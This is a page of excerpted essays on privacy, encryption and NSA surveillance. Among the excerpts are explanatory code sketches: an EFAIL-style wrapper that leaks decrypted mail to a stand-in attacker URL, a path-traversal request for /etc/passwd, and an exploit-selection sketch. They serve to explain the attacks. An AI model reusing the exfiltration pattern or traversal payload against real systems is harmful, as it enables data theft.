Essays in the Category “Privacy and Surveillance”
Mark Zuckerberg wants to fix the social network. Here’s what he’ll need to do.
Facebook is making a new and stronger commitment to privacy. Last month, the company hired three of its most vociferous critics and installed them in senior technical positions. And on Wednesday, Mark Zuckerberg wrote that the company will pivot to focus on private conversations over the public sharing that has long defined the platform, even while conceding that "frankly we don't currently have a strong reputation for building privacy protective services."
There is ample reason to question Zuckerberg's pronouncement: The company has made—and broken—many privacy promises over the years. And if you read his 3,000-word post carefully, Zuckerberg says nothing about changing Facebook's surveillance capitalism business model.
The so-called Crypto Wars have been going on for 25 years now. Basically, the FBI—and some of its peer agencies in the U.K., Australia, and elsewhere—argue that the pervasive use of civilian encryption is hampering their ability to solve crimes and that they need the tech companies to make their systems susceptible to government eavesdropping. Sometimes their complaint is about communications systems, like voice or messaging apps. Sometimes it's about end-user devices.
Excerpted from the upcoming issue of McSweeney's, "The End of Trust," a collection featuring more than 30 writers investigating surveillance, technology, and privacy.
In my book Data and Goliath, I write about the value of privacy. I talk about how it is essential for political liberty and justice, and for commercial fairness and equality. I talk about how it increases personal freedom and individual autonomy, and how the lack of it makes us all less secure. But this is probably the most important argument as to why society as a whole must protect privacy: it allows society to progress.
Internet censors have a new strategy in their bid to block applications and websites: pressuring the large cloud providers that host them. These providers have concerns that are much broader than the targets of censorship efforts, so they have the choice of either standing up to the censors or capitulating in order to maximize their business. Today's internet largely reflects the dominance of a handful of companies behind the cloud services, search engines and mobile platforms that underpin the technology landscape. This new centralization radically tips the balance between those who want to censor parts of the internet and those trying to evade censorship.
When Mark Zuckerberg testified before both the House and the Senate last month, it became immediately obvious that few US lawmakers had any appetite to regulate the pervasive surveillance taking place on the internet.
Right now, the only way we can force these companies to take our privacy more seriously is through the market. But the market is broken. First, none of us do business directly with these data brokers.
Last week, researchers disclosed vulnerabilities in a large number of encrypted email clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and email security in particular.
But first, if you use PGP or S/MIME to encrypt email, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they've fixed the vulnerability.
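The core of the "direct exfiltration" variant of these attacks is simple once you see it. The sketch below is a simplified illustration only: the real attacks involve MIME message structure and CBC/CFB malleability gadgets, and the attacker URL and helper names here are hypothetical.

```python
# Simplified sketch of the "direct exfiltration" idea: the attacker
# wraps the encrypted MIME part in an unclosed HTML image tag. When a
# vulnerable client decrypts the part and renders the whole message as
# one HTML document, the plaintext lands inside the image URL, and the
# HTML engine dutifully fetches it from the attacker's server.
ATTACKER = "http://attacker.example/collect?d="  # hypothetical URL

def attacker_wraps(encrypted_part: str) -> str:
    # The attacker cannot read encrypted_part; they only reposition it
    # inside HTML of their choosing.
    return f'<img src="{ATTACKER}' + "\n" + encrypted_part + "\n" + '">'

def vulnerable_client_renders(message: str, decrypt) -> str:
    # A vulnerable client decrypts the embedded part in place...
    html = message.replace("CIPHERTEXT", decrypt("CIPHERTEXT"))
    # ...so the decrypted secret is now part of the image URL, which
    # the rendering engine will request from the attacker's server.
    return html

msg = attacker_wraps("CIPHERTEXT")
rendered = vulnerable_client_renders(msg, lambda c: "the secret plaintext")
print(ATTACKER in rendered and "the secret plaintext" in rendered)  # True
```

This is why the short-term mitigations focused on disabling HTML rendering and remote content loading in mail clients, not on the OpenPGP algorithms themselves.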
In the wake of the Cambridge Analytica scandal, news articles and commentators have focused on what Facebook knows about us. A lot, it turns out. It collects data from our posts, our likes, our photos, things we type and delete without posting, and things we do while not on Facebook and even when we're offline. It buys data about us from others.
This essay appeared as half of a point/counterpoint with Priscilla Regan, in a CQ Researcher report on Privacy and the Internet.
Everything online is hackable. This is true for Equifax's data and the federal Office of Personnel Management's data, which was hacked in 2015. If information is on a computer connected to the internet, it is vulnerable.
But just because everything is hackable doesn't mean everything will be hacked.
What the battle looks like after Section 702's reauthorization
For over a decade, civil libertarians have been fighting government mass surveillance of innocent Americans over the Internet. We've just lost an important battle. On Jan. 18, when President Trump signed the renewal of Section 702, domestic mass surveillance became effectively a permanent part of U.S. law.
The cellphones we carry with us constantly are the most perfect surveillance device ever invented, and our laws haven't caught up to that reality. That might change soon.
This week, the Supreme Court will hear a case with profound implications for your security and privacy in the coming years. The Fourth Amendment's prohibition of unlawful search and seizure is a vital right that protects us all from police overreach, and the way the courts interpret it is increasingly nonsensical in our computerized and networked world.
Testimony and Statement for the Record of Bruce Schneier
Fellow and Lecturer, Belfer Center for Science and International Affairs, Harvard Kennedy School
Fellow, Berkman Center for Internet and Society at Harvard Law School
Hearing on "Securing Consumers' Credit Data in the Age of Digital Commerce"
Subcommittee on Digital Commerce and Consumer Protection
Committee on Energy and Commerce
United States House of Representatives
1 November 2017
2125 Rayburn House Office Building
Washington, DC 20515
Mister Chairman and Members of the Committee, thank you for the opportunity to testify today concerning the security of credit data. My name is Bruce Schneier, and I am a security technologist. For over 30 years I have studied the technologies of security and privacy. I have authored 13 books on these subjects, including Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World (Norton, 2015).
There's something going on inside the intelligence communities in at least two countries, and we have no idea what it is.
Consider these three data points. One: someone, probably a country's intelligence organization, is dumping massive amounts of cyberattack tools belonging to the NSA onto the Internet. Two: someone else, or maybe the same someone, is doing the same thing to the CIA.
Weakness in digital communications systems allows security to be bypassed, leaving users at risk of being spied on.
Governments want to spy on their citizens for all sorts of reasons. Some countries do it to help solve crimes or to try to find "terrorists" before they act.
Others do it to find and arrest reporters or dissidents. Some only target individuals, others attempt to spy on everyone all the time.
Think about all of the websites you visit every day. Now imagine if the likes of Time Warner, AT&T and Verizon collected all of your browsing history and sold it on to the highest bidder. That's what will probably happen if Congress has its way.
This week, lawmakers voted to allow internet service providers to violate your privacy for their own profit.
Don't get doxed.
This essay also appeared in The Age.
A decade ago, I wrote about the death of ephemeral conversation. As computers were becoming ubiquitous, some unintended changes happened, too: Before computers, what we said disappeared once we'd said it. Neither face-to-face conversations nor telephone conversations were routinely recorded.
In today's world of ubiquitous computers and networks, it's hard to overstate the value of encryption. Quite simply, encryption keeps you safe. Encryption protects your financial details and passwords when you bank online. It protects your cell phone conversations from eavesdroppers.
Writing a magazine column is always an exercise in time travel. I'm writing these words in early December. You're reading them in February. This means anything that's news as I write this will be old hat in two months, and anything that's news to you hasn't happened yet as I'm writing.
Thefts of personal information aren't unusual. Every week, thieves break into networks and steal data about people, often tens of millions at a time. Most of the time it's information that's needed to commit fraud, as happened in 2015 to Experian and the IRS.
Sometimes it's stolen for purposes of embarrassment or coercion, as in the 2015 cases of Ashley Madison and the U.S.
Either everyone gets security, or no one does.
Earlier this week, a federal magistrate ordered Apple to assist the FBI in hacking into the iPhone used by one of the San Bernardino shooters. Apple will fight this order in court.
The policy implications are complicated. The FBI wants to set a precedent that tech companies will assist law enforcement in breaking their users' security, and the technology community is afraid that the precedent will limit what sorts of security features it can offer customers.
Advertising in the 2016 election is going to be highly personalized, targeting voters’ personal information to sway their decisions
This presidential election, prepare to be manipulated.
In politics, as in the marketplace, you are the consumer. But you only have one vote to "spend" per election, and in November you'll almost always only have two possible candidates on which to spend it.
In every election, both of those candidates are going to pull every trick in the surveillance-driven, highly personalized internet advertising world to get you to vote for them.
Both the "going dark" metaphor of FBI Director James Comey and the contrasting "golden age of surveillance" metaphor of privacy law professor Peter Swire focus on the value of data to law enforcement. As framed in the media, encryption debates are about whether law enforcement should have surreptitious access to data, or whether companies should be allowed to provide strong encryption to their customers.
It's a myopic framing that focuses only on one threat—criminals, including domestic terrorists—and the demands of law enforcement and national intelligence. This obscures the most important aspects of the encryption issue: the security it provides against a much wider variety of threats.
Many technological security failures of today can be traced to failures of encryption. In 2014 and 2015, unnamed hackers—probably the Chinese government—stole 21.5 million personal files of U.S. government employees and others. They wouldn't have obtained this data if it had been encrypted.
SilverPush is an Indian startup that's trying to figure out all the different computing devices you own. It embeds inaudible sounds into the webpages you read and the television commercials you watch. Software secretly embedded in your computers, tablets, and smartphones picks up the signals, and then uses cookies to transmit that information back to SilverPush. The result is that the company can track you across your different devices. It can correlate the television commercials you watch with the web searches you make.
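The cross-device correlation step is conceptually simple. Here is a minimal sketch under stated assumptions: the device and beacon identifiers are invented for illustration, and this is not SilverPush's actual algorithm, just the general linking technique the paragraph describes.

```python
# Hypothetical sketch of cross-device correlation via shared beacon IDs.
# Each device reports (device_id, beacon_id) sightings; devices that
# hear the same inaudible beacon were in front of the same screen, so
# they probably belong to the same person.
from collections import defaultdict

sightings = [
    ("laptop-1", "ad-beacon-77"),
    ("phone-9",  "ad-beacon-77"),
    ("phone-9",  "tv-beacon-12"),
    ("tablet-4", "tv-beacon-12"),
]

by_beacon = defaultdict(set)
for device, beacon in sightings:
    by_beacon[beacon].add(device)

# Devices that co-occur on any beacon get linked into one profile.
links = {frozenset(devs) for devs in by_beacon.values() if len(devs) > 1}
print(sorted(sorted(s) for s in links))
# [['laptop-1', 'phone-9'], ['phone-9', 'tablet-4']]
```

Note that "phone-9" appears in both links, transitively tying all three devices to one person: that is exactly the correlation the company is selling.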
China is considering a new "social credit" system, designed to rate everyone's trustworthiness. Many fear that it will become a tool of social control—but in reality it has a lot in common with the algorithms and systems that score and classify us all every day.
Human judgment is being replaced by automatic algorithms, and that brings with it both enormous benefits and risks. The technology is enabling a new form of social control, sometimes deliberately and sometimes as a side effect.
ID checks were a common response to the terrorist attacks of 9/11, but they'll soon be obsolete. You won't have to show your ID, because you'll be identified automatically. A security camera will capture your face, and it'll be matched with your name and a whole lot of other information besides. Welcome to the world of automatic facial recognition.
Last month, a Kentucky man shot down a drone that was hovering near his backyard.
WDRB News reported that the camera drone's owners soon showed up at the home of the shooter, William H. Merideth: "Four guys came over to confront me about it, and I happened to be armed, so that changed their minds," Merideth said. "They asked me, 'Are you the S-O-B that shot my drone?' and I said, 'Yes I am,'" he said. "I had my 40 mm Glock on me and they started toward me and I told them, 'If you cross my sidewalk, there's gonna be another shooting.'" Police charged Merideth with criminal mischief and wanton endangerment.
The doxing of Ashley Madison reveals an uncomfortable truth: In the age of cloud computing, everyone is vulnerable.
Most of us get to be thoroughly relieved that our emails weren't in the Ashley Madison database. But don't get too comfortable. Whatever secrets you have, even the ones you don't think of as secret, are more likely than you think to get dumped on the Internet. It's not your fault, and there's largely nothing you can do about it.
Encryption protects our data. It protects our data when it’s sitting on our computers and in data centres, and it protects it when it's being transmitted around the Internet. It protects our conversations, whether video, voice, or text. It protects our privacy.
Last weekend, the Sunday Times published a front-page story (full text here), citing anonymous British sources claiming that both China and Russia have copies of the Snowden documents. It's a terrible article, filled with factual inaccuracies and unsubstantiated claims about both Snowden's actions and the damage caused by his disclosure, and others have thoroughly refuted the story. I want to focus on the actual question: Do countries like China and Russia have copies of the Snowden documents?
I believe the answer is certainly yes, but that it's almost certainly not Snowden's fault.
From TVs that listen in on us to a doll that records your child’s questions, data collection has become both dangerously intrusive and highly profitable. Is it time for governments to act to curb online surveillance?
Last year, when my refrigerator broke, the repair man replaced the computer that controls it. I realised that I had been thinking about the refrigerator backwards: it's not a refrigerator with a computer, it's a computer that keeps food cold. Just like that, everything is turning into a computer. Your phone is a computer that makes calls.
What's your electronic data worth to you? What is it worth to others? And what's the dividing line between your privacy and your convenience? These are questions Bruce Schneier thinks a lot about, and as he shows in Data and Goliath, they are questions which have an impact on where society and technology are going next.
Data and Goliath is a book about surveillance, both government and corporate. It's an exploration in three parts: what's happening, why it matters, and what to do about it.
In December Google's Executive Chairman Eric Schmidt was interviewed at the CATO Institute Surveillance Conference. One of the things he said, after talking about some of the security measures his company has put in place post-Snowden, was: "If you have important information, the safest place to keep it is in Google. And I can assure you that the safest place to not keep it is anywhere else."
That surprised me, because Google collects all of your information to show you more targeted advertising. Surveillance is the business model of the Internet, and Google is one of the most successful companies at it. To claim that Google protects your privacy better than anyone else is to profoundly misunderstand why Google stores your data for free in the first place.
German translation by Damian Weber
Earlier this week, we learned that Samsung televisions are eavesdropping on their owners. If you have one of their Internet-connected smart TVs, you can turn on a voice command feature that saves you the trouble of finding the remote, pushing buttons and scrolling through menus. But making that feature work requires the television to listen to everything you say. And what you say isn't just processed by the television; it may be forwarded over the Internet for remote processing.
Thousands of articles have called the December attack against Sony Pictures a wake-up call to industry. Regardless of whether the attacker was the North Korean government, a disgruntled former employee, or a group of random hackers, the attack showed how vulnerable a large organization can be and how devastating the publication of its private correspondence, proprietary data, and intellectual property can be.
But while companies are supposed to learn that they need to improve their security against attack, there's another equally important but much less discussed lesson here: companies should have an aggressive deletion policy.
One of the social trends of the computerization of our business and social communications tools is the loss of the ephemeral.
Those of you unfamiliar with hacker culture might need an explanation of “doxing.”
The word refers to the practice of publishing personal information about people without their consent. Usually it’s things like an address and phone number, but it can also be credit card details, medical information, private e-mails—pretty much anything an assailant can get his hands on.
Doxing is not new; the term dates back to 2001 and the hacker group Anonymous. But it can be incredibly offensive. In 2014, several women were doxed by male gamers trying to intimidate them into keeping silent about sexism in computer games.
A focused, skillful cyber attacker will always get in, warns a security expert.
Earlier this month, a mysterious group that calls itself Guardians of Peace hacked into Sony Pictures Entertainment's computer systems and began revealing many of the Hollywood studio's best-kept secrets, from details about unreleased movies to embarrassing emails (notably some racist notes from Sony bigwigs about President Barack Obama's presumed movie-watching preferences) to the personnel data of employees, including salaries and performance reviews. The Federal Bureau of Investigation now says it has evidence that North Korea was behind the attack, and Sony Pictures pulled its planned release of "The Interview," a satire targeting that country's dictator, after the hackers made some ridiculous threats about terrorist violence.
Your reaction to the massive hacking of such a prominent company will depend on whether you're fluent in information-technology security. If you're not, you're probably wondering how in the world this could happen.
First we thought North Korea was behind the Sony cyberattacks. Then we thought it was a couple of hacker guys with an axe to grind. Now we think North Korea is behind it again, but the connection is still tenuous. There have been accusations of cyberterrorism, and even cyberwar.
A warrantless FBI search in Las Vegas sets a troubling precedent.
The next time you call for assistance because the Internet service in your home is not working, the 'technician' who comes to your door may actually be an undercover government agent. He will have secretly disconnected the service, knowing that you will naturally call for help and—when he shows up at your door, impersonating a technician—let him in. He will walk through each room of your house, claiming to diagnose the problem. Actually, he will be videotaping everything (and everyone) inside.
German translation by Yuri Samoilov
There's a new international survey on Internet security and trust, of '23,376 Internet users in 24 countries,' including 'Australia, Brazil, Canada, China, Egypt, France, Germany, Great Britain, Hong Kong, India, Indonesia, Italy, Japan, Kenya, Mexico, Nigeria, Pakistan, Poland, South Africa, South Korea, Sweden, Tunisia, Turkey and the United States.' Amongst the findings, 60% of Internet users have heard of Edward Snowden, and 39% of those 'have taken steps to protect their online privacy and security as a result of his revelations.'
The press is mostly spinning this as evidence that Snowden has not had an effect: 'merely 39%,' 'only 39%,' and so on. (Note that these articles are completely misunderstanding the data. It's not 39% of people who are taking steps to protect their privacy post-Snowden, it's 39% of the 60% of Internet users—which is not everybody—who have heard of him. So it's much less than 39%.)
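The correction is worth making explicit, since several outlets got it wrong. Working through the survey's own figures:

```python
# Survey figures: 60% of internet users have heard of Snowden, and
# 39% of *those* say they took steps to protect their privacy.
heard_of_snowden = 0.60
took_steps_of_those = 0.39

# Fraction of ALL internet users who took steps as a result:
overall = heard_of_snowden * took_steps_of_those
print(f"{overall:.1%}")  # 23.4%
```

So the defensible headline number is roughly 23%, not 39%, and even that is 23% of internet users, not of everybody.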
Even so, I disagree with the 'Edward Snowden Revelations Not Having Much Impact on Internet Users' headline.
In the Internet age, we have no choice but to entrust our data with private companies: e-mail providers, service providers, retailers, and so on.
We realize that this data is at risk from hackers. But there's another risk as well: the employees of the companies who are holding our data for us.
In the early years of Facebook, employees had a master password that enabled them to view anything they wanted in any account.
There's a debate going on about whether the U.S. government—specifically, the NSA and United States Cyber Command—should stockpile Internet vulnerabilities or disclose and fix them. It's a complicated problem, and one that starkly illustrates the difficulty of separating attack and defense in cyberspace.
A software vulnerability is a programming mistake that allows an adversary access into a system.
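A concrete example helps here. The snippet below is a hypothetical illustration of one classic class of such mistakes, a path-traversal bug; the file-server functions and web-root path are invented for the example.

```python
# A classic programming mistake: path traversal. This hypothetical
# file server means to serve files only from /var/www, but never
# checks the user-supplied name.
import os.path

WEB_ROOT = "/var/www"

def serve_vulnerable(filename: str) -> str:
    # BUG: "../" sequences in filename escape the intended directory.
    return os.path.normpath(os.path.join(WEB_ROOT, filename))

def serve_fixed(filename: str) -> str:
    # Fix: resolve the path, then verify it is still under the root.
    path = os.path.normpath(os.path.join(WEB_ROOT, filename))
    if not path.startswith(WEB_ROOT + os.sep):
        raise ValueError("path escapes web root")
    return path

print(serve_vulnerable("../../etc/passwd"))  # /etc/passwd
```

Until the mistake is found and fixed, anyone who requests `../../etc/passwd` reads a file the server was never supposed to expose, which is exactly what makes a stockpiled, undisclosed vulnerability valuable to an attacker.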
According to NSA documents published in Glenn Greenwald's new book "No Place to Hide," we now know that the NSA spies on embassies and missions all over the world, including those of Brazil, Bulgaria, Colombia, the European Union, France, Georgia, Greece, India, Italy, Japan, Mexico, Slovakia, South Africa, South Korea, Taiwan, Venezuela and Vietnam.
This will certainly strain international relations, as happened when it was revealed that the United States is eavesdropping on German Chancellor Angela Merkel's cell phone—but is anyone really surprised? Spying on foreign governments is what the NSA is supposed to do. Much more problematic, and dangerous, is that the NSA spies on entire populations.
In addition to turning the Internet into a worldwide surveillance platform, the NSA has surreptitiously weakened the products, protocols, and standards we all use to protect ourselves. By doing so, it has destroyed the trust that underlies the Internet. We need that trust back.
Trust is inherently social.
Ephemeral messaging apps such as Snapchat, Wickr and Frankly, all of which advertise that your photo, message or update will only be accessible for a short period, are on the rise. Snapchat and Frankly, for example, claim they permanently delete messages, photos and videos after 10 seconds. After that, there's no record.
This notion is especially popular with young people, and these apps are an antidote to sites such as Facebook where everything you post lasts forever unless you take it down—and taking it down is no guarantee that it isn't still available.
Don’t Listen to Google and Facebook: The Public-Private Surveillance Partnership Is Still Going Strong
And real corporate security is still impossible.
If you've been reading the news recently, you might think that corporate America is doing its best to thwart NSA surveillance.
Google just announced that it is encrypting Gmail when you access it from your computer or phone, and between data centers. Last week, Mark Zuckerberg personally called President Obama to complain about the NSA using Facebook as a means to hack computers, and Facebook's Chief Security Officer explained to reporters that the attack technique has not worked since last summer. Yahoo, Google, Microsoft, and others are now regularly publishing "transparency reports," listing approximately how many government data requests the companies have received and complied with.
Back when we first started getting reports of the Chinese breaking into U.S. computer networks for espionage purposes, we described it in some very strong language. We called the Chinese actions cyber-attacks. We sometimes even invoked the word cyberwar, and declared that a cyber-attack was an act of war.
Ever since reporters began publishing stories about NSA activities, based on documents provided by Edward Snowden, we've been repeatedly assured by government officials that it's "only metadata." This might fool the average person, but it shouldn't fool those of us in the security field. Metadata equals surveillance data, and collecting metadata on people means putting them under surveillance.
An easy thought experiment demonstrates this. Imagine that you hired a private detective to eavesdrop on a subject.
Increasingly, we are watched not by people but by algorithms. Amazon and Netflix track the books we buy and the movies we stream, and suggest other books and movies based on our habits. Google and Facebook watch what we do and what we say, and show us advertisements based on our behavior. Google even modifies our web search results based on our previous behavior.
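The "suggest based on our habits" machinery can be sketched in a few lines. This is a toy co-occurrence recommender on invented data, not any company's actual algorithm:

```python
# Minimal sketch of habit-based recommendation: suggest items that
# users with overlapping taste consumed and you haven't. Toy data.
from collections import Counter

histories = {
    "alice": {"A", "B", "C"},
    "bob":   {"B", "C", "D"},
    "carol": {"A", "C", "D"},
}

def recommend(user: str) -> list:
    seen = histories[user]
    counts = Counter()
    for other, items in histories.items():
        if other == user:
            continue
        if seen & items:                  # overlapping taste
            counts.update(items - seen)   # what they saw that you haven't
    return [item for item, _ in counts.most_common()]

print(recommend("alice"))  # ['D'] -- both similar users consumed D
```

The point of the sketch is the input, not the output: even this trivial recommender only works because someone is recording everything every user does.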
The NSA has become too big and too powerful. What was supposed to be a single agency with a dual mission—protecting the security of U.S. communications and eavesdropping on the communications of our enemies—has become unbalanced in the post-Cold War, all-terrorism-all-the-time era.
Putting the U.S.
Giving it to private companies will only make privacy intrusion worse.
One of the recommendations by the president's Review Group on Intelligence and Communications Technologies on reforming the National Security Agency—No. 5, if you're counting—is that the government should not collect and store telephone metadata. Instead, a private company—either the phone companies themselves or some other third party—should store the metadata and provide it to the government only upon a court order.
This isn't a new idea. Over the past decade, several countries have enacted mandatory data retention laws, in which companies are required to save Internet or telephony data about customers for a specified period of time, in case the government needs it for an investigation.
Glenn Greenwald is back reporting about the NSA, now with Pierre Omidyar's news organization FirstLook and its introductory publication, The Intercept. Writing with national security reporter Jeremy Scahill, his first article covers how the NSA helps target individuals for assassination by drone.
Leaving aside the extensive political implications of the story, the article and the NSA source documents reveal additional information about how the agency's programs work. From this and other articles, we can now piece together how the NSA tracks individuals in the real world through their actions in cyberspace.
Secret NSA eavesdropping is still in the news. Details about once secret programs continue to leak. The Director of National Intelligence has recently declassified additional information, and the President's Review Group has just released its report and recommendations.
With all this going on, it's easy to become inured to the breadth and depth of the NSA's activities.
Google recently announced that it would start including individual users' names and photos in some ads. This means that if you rate some product positively, your friends may see ads for that product with your name and photo attached—without your knowledge or consent. Meanwhile, Facebook is eliminating a feature that allowed people to retain some portions of their anonymity on its website.
These changes come on the heels of Google's move to explore replacing tracking cookies with something that users have even less control over.
The public/private surveillance partnership between the NSA and corporate data collectors is starting to fray. The reason is sunlight. The publicity resulting from the Snowden documents has made companies think twice before allowing the NSA access to their users' and customers' data.
Pre-Snowden, there was no downside to cooperating with the NSA.
In the Information Age, it's easier than ever to steal and publish data. Corporations and governments have to adjust to their secrets being exposed, regularly.
When massive amounts of government documents are leaked, journalists sift through them to determine which pieces of information are newsworthy, and confer with government agencies over what needs to be redacted.
Managing this reality is going to require that governments actively engage with members of the press who receive leaked secrets, helping them secure those secrets—even while being unable to prevent them from publishing.
Distributed citizen groups and nimble hackers once had the edge. Now governments and corporations are catching up. Who will dominate in the decades ahead?
We're in the middle of an epic battle for power in cyberspace. On one side are the traditional, organized, institutional powers such as governments and large multinational corporations. On the other are the distributed and nimble: grassroots movements, dissident groups, hackers, and criminals. Initially, the Internet empowered the second side.
The basic government defense of the NSA's bulk-collection programs—whether it be the list of all the telephone calls you made, your email address book and IM buddy list, or the messages you send your friends—is that what the agency is doing is perfectly legal, and doesn't really count as surveillance, until a human being looks at the data.
It's what Director of National Intelligence James R. Clapper meant when he lied to Congress. When asked, "Does the NSA collect any type of data at all on millions or hundreds of millions of Americans?" he replied, "No sir, not wittingly." To him, the definition of "collect" requires that a human look at it. So when the NSA collects—using the dictionary definition of the word—data on hundreds of millions of Americans, it's not really collecting it, because only computers process it.
We already know the NSA wants to eavesdrop on the internet. It has secret agreements with telcos to get direct access to bulk internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext—encrypted information—and figure out which programs could have created it.
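Identifying ciphertext in a traffic stream is easier than it might sound. One common heuristic, sketched below under the assumption that this is illustrative and not the NSA's actual method: encrypted (or well-compressed) data looks like uniform random bytes, so its per-byte Shannon entropy approaches 8 bits, while text and most file formats score far lower.

```python
# Heuristic for spotting ciphertext: measure per-byte Shannon entropy.
# Random-looking data (ciphertext, compressed files) approaches the
# maximum of 8 bits/byte; natural-language text sits much lower.
import math
import os
from collections import Counter

def entropy_bits_per_byte(data: bytes) -> float:
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

english = b"the quick brown fox jumps over the lazy dog " * 200
randomish = os.urandom(8800)  # stands in for ciphertext

print(round(entropy_bits_per_byte(english), 2))    # well below 8
print(round(entropy_bits_per_byte(randomish), 2))  # close to 8
```

Entropy alone can't tell AES output from a zip file, which is where the second step the documents describe comes in: fingerprinting which programs could have produced a given ciphertext format.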
Historically, surveillance was difficult and expensive.
Over the decades, as technology advanced, surveillance became easier and easier. Today, we find ourselves in a world of ubiquitous surveillance, where everything is collected, saved, searched, correlated and analyzed.
But while technology allowed for an increase in both corporate and government surveillance, the private and public sectors took very different paths to get there.
Since I started working with Snowden's documents, I have been using a number of tools to try to stay secure from the NSA. The advice I shared included using Tor, preferring certain cryptography over others, and using public-domain encryption wherever possible.
I also recommended using an air gap, which physically isolates a computer or local network of computers from the internet. (The name comes from the literal gap of air between the computer and the internet; the word predates wireless networks.)
But this is more complicated than it sounds, and requires explanation.
The National Security Agency has made repeated attempts to develop attacks against people using Tor, a popular tool designed to protect online anonymity, despite the fact the software is primarily funded and promoted by the US government itself.
Top-secret NSA documents, disclosed by whistleblower Edward Snowden, reveal that the agency's current successes against Tor rely on identifying users and then attacking vulnerable software on their computers. One technique developed by the agency targeted the Firefox web browser used with Tor, giving the agency full control over targets' computers, including access to files, all keystrokes and all online activity.
But the documents suggest that the fundamental security of the Tor service remains intact.
Secret servers and a privileged position on the internet's backbone used to identify users and attack target computers
The online anonymity network Tor is a high-priority target for the National Security Agency. The work of attacking Tor is done by the NSA's application vulnerabilities branch, which is part of the systems intelligence directorate, or SID. The majority of NSA employees work in SID, which is tasked with collecting data from communications systems around the world.
According to a top-secret NSA presentation provided by the whistleblower Edward Snowden, one successful technique the NSA has developed involves exploiting the Tor browser bundle, a collection of programs designed to make it easy for people to install and use the software.
By reporting on the agency's actions, the vulnerabilities in our computer systems can be fixed. It's the only way to force change
Today, the Guardian is reporting on how the NSA targets Tor users, along with details of how it uses centrally placed servers on the internet to attack individual computers. This builds on a Brazilian news story from last week that, in part, shows that the NSA is impersonating Google servers to users; a German story on how the NSA is hacking into smartphones; and a Guardian story from two weeks ago on how the NSA is deliberately weakening common security algorithms, protocols, and products.
The common thread among these stories is that the NSA is subverting the internet and turning it into a massive surveillance tool. The NSA's actions are making us all less safe, because its eavesdropping mission is degrading its ability to protect the US.
As I report in The Guardian today, the NSA has secret servers on the Internet that hack into other computers, codenamed FOXACID. These servers provide an excellent demonstration of how the NSA approaches risk management, and expose flaws in how the agency thinks about the secrecy of its own programs.
Here are the FOXACID basics: By the time the NSA tricks a target into visiting one of those servers, it already knows exactly who that target is, who wants him eavesdropped on, and the expected value of the data it hopes to receive. Based on that information, the server can automatically decide what exploit to serve the target, taking into account the risks associated with attacking the target, as well as the benefits of a successful attack.
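The decision logic described above can be imagined as a simple expected-value calculation. The sketch below is purely illustrative: the exploit names, probabilities, and costs are all invented, not taken from the documents.

```python
# Hypothetical sketch of the expected-value exploit selection described
# above: weigh the benefit of a successful attack against the cost of
# exposing the exploit. Every name and number here is invented.

def choose_exploit(target_value, exploits):
    """Return the exploit name maximizing expected benefit minus risk."""
    best_name, best_score = None, float("-inf")
    for name, p_success, exposure_cost in exploits:
        score = p_success * target_value - exposure_cost
        if score > best_score:
            best_name, best_score = name, score
    return best_name

# Invented catalogue: (name, probability of success, cost if discovered).
catalogue = [
    ("common_browser_bug", 0.6, 1.0),   # widely known, cheap to burn
    ("rare_zero_day",      0.9, 50.0),  # powerful, expensive to expose
]

print(choose_exploit(10, catalogue))   # low-value target gets the cheap exploit
print(choose_exploit(200, catalogue))  # high-value target justifies the zero-day
```

A low-value target never sees the expensive exploit, which matches the risk calculus the essay describes: powerful attacks are reserved for targets worth the chance of exposure.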
The nation can survive the occasional terrorist attack, but our freedoms can't survive an invulnerable leader like Keith Alexander operating within inadequate constraints.
Leaks from the whistleblower Edward Snowden have catapulted the NSA into newspaper headlines and demonstrated that it has become one of the most powerful government agencies in the country. From the secret court rulings that allow it to collect data on all Americans to its systematic subversion of the entire Internet as a surveillance platform, the NSA has amassed an enormous amount of power.
There are two basic schools of thought about how this came to pass. The first focuses on the agency's power.
We recently learned that U.S. intelligence agencies had at least three days' warning that Syrian President Bashar al-Assad was preparing to launch a chemical attack on his own people, but weren't able to stop it. At least that's what an intelligence briefing from the White House reveals. With the combined abilities of our national intelligence apparatus—the CIA, National Security Agency, National Reconnaissance Office and all the rest—it's not surprising that we had advance notice.
The NSA has huge capabilities – and if it wants in to your computer, it's in. With that in mind, here are five ways to stay safe
Now that we have enough details about how the NSA eavesdrops on the internet, including today's disclosures of the NSA's deliberate weakening of cryptographic systems, we can finally start to figure out how to protect ourselves.
For the past two weeks, I have been working with the Guardian on NSA stories, and have read hundreds of top-secret NSA documents provided by whistleblower Edward Snowden. I wasn't part of today's story—it was in process well before I showed up—but everything I read confirms what the Guardian is reporting.
At this point, I feel I can provide some advice for keeping secure against such an adversary.
The NSA has undermined a fundamental social contract. We engineers built the internet – and now we have to fix it
Government and industry have betrayed the internet, and us.
By subverting the internet at every level to make it a vast, multi-layered and robust surveillance platform, the NSA has undermined a fundamental social contract. The companies that build and manage our internet infrastructure, the companies that create and sell us our hardware and software, or the companies that host our data: we can no longer trust them to be ethical internet stewards.
This is not the internet the world needs, or the internet its creators envisioned.
Big-government secrets require a lot of secret-keepers. As of October 2012, almost 5m people in the US have security clearances, with 1.4m at the top-secret level or higher, according to the Office of the Director of National Intelligence.
Most of these people do not have access to as much information as Edward Snowden, the former National Security Agency contractor turned leaker, or even Chelsea Manning, the former US army soldier previously known as Bradley, who was convicted of giving material to WikiLeaks. But a lot of them do—and that may prove the Achilles heel of government.
The latest Snowden document is the US intelligence 'black budget.' There's a lot of information in the few pages the Washington Post decided to publish, including an introduction by Director of National Intelligence James Clapper. In it, he drops a tantalizing hint: 'Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.'
Honestly, I'm skeptical. Whatever the NSA has up its top-secret sleeves, the mathematics of cryptography will still be the most secure part of any encryption system. I worry a lot more about poorly designed cryptographic products, software bugs, bad passwords, companies that collaborate with the NSA to leak all or part of the keys, and insecure computers and networks.
